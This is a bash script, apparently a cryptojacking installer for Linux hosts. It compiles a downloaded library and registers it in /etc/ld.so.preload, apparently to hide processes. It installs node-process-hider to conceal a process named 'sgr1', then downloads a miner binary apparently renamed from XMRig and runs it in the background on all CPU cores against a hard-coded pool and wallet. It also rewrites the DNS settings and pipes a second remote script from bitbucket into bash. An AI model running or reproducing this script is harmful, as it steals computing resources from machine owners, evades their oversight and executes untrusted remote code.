#!/bin/bash
apt-get update ; apt-get install sudo -y
apt install libhwloc-dev -y
sudo apt install libhwloc-dev -y
curl https://github.com/adawisaud/adawisaud/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.2.0 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget -O sgr1 https://bitbucket.org/mypile/filesg/downloads/xlarig >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 --donate-level 1 -o 199.247.17.189:80 -u solo:Ssy2Qc3HNtyGv4w6KbUM4sLgW3fBEhXqPdePAHCoyXXcfzvFXqWdqPh17zvTgJS6vMXD9M9k62Kf8T46LXQf8Xs67Z9zoT6XcL -p $(echo $(shuf -i 1-30000 -n 1)-A) -a panthera -k -t $(nproc --all) --background
curl -sL https://bitbucket.org/mypile/filesg/raw/main/boled04.sh | bash